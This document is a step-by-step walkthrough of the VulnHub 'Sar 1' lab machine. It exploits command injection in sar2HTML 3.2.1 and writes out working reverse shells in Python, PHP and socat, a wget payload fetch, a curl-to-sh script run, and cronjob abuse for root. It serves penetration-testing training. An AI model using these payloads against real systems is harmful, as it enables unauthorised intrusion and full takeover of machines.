How to hack into Sar 1 from VulHub

https://www.vulnhub.com/entry/sar-1,425/

Discover Targer Networks

• sudo nmap -sn 192.168.122.1-255
• sudo nmap -p- 192.168.122.207

Port 80

• run dirb http://192.168.122.207 and found http://192.168.122.207/phpinfo.php
• Visit http://192.168.122.207/robots.txt and foundhttp://192.168.122.207/sar2HTML/

sar2HTML

• Version 3.2.1 of sar2HTML is vulnerble to remote code execution using URL GET request https://www.exploit-db.com/exploits/47204

Reverse Shell

• we can add any command after http://192.168.122.207/sar2HTML/index.php?plot=; to run, we can try some options from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Python

• we can check if python exist on the machine
• http://192.168.122.207/sar2HTML/index.php?plot=;which python3
• then we can run ncat -nvlp 4444on the attacker’s machine, and go tohttp://192.168.122.207/sar2HTML/index.php?plot=;python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.122.101",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' , now we have a reversed shell

PHP

• get a copy of PHP reverse shell script to current directory cp /usr/share/webshells/php/php-reverse-shell.php ., change the ip and port to attacker’s
• start a simple HTTP server on attacker using Python 3 python -m http.server 8888
• download the PHP script on to the target machine by visiting http://192.168.122.207/sar2HTML/index.php?plot=;wget http://192.168.122.101:8888/php-reverse-shell.php or upload it
• start a listening port on attacker using ncat -nvlp 7777, and visit http://192.168.122.207/sar2HTML/php-reverse-shell.php, now we have a reversed shell

Explore the target machine

• Get a better shell using Python: python3 -c 'import pty;pty.spawn("/bin/bash")'
• seeing all the users on target machine by cat /etc/passwd, we see an actual user called love
• Try running LinPeas.sh : curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
• we found out there is a cronjob that runs every 5 minutes by root

*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

• if we cat /var/www/html/finally.sh,

#!/bin/sh

./write.sh

it’s a shell script that will run /var/www/html/write.sh, and if we open write.sh, it will be some random shell script that creates a file in /tmp

• If we ls -l /var/www/html too all the file permissions and ownerships, we can see that finally.sh is owned by root so we can’t modify it right now, but write.sh is owned by www-data, which is our current daemon user.

Privilege escalation

• Because from that cronjob, we know that write.sh will be executed by root every 5 minutes, we can just try to modify it and give us another reverse shell, and it will be as root.
• we can’t just use nano or vi in this junk shell, as userwww-data doesn’t have a TTY
• we can try echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.122.101:4444" >> write.sh to put reversed shell command in there.
• Now open a listener on attacker’s machine, and just wait

Capture the flags

• now we are root, we can change our passwords, install openssh-server and start it, then we can SSH into the machine instead
• cat /home/love/Desktop/user.txt to get user flag
• cat /root/root.txt to get root flag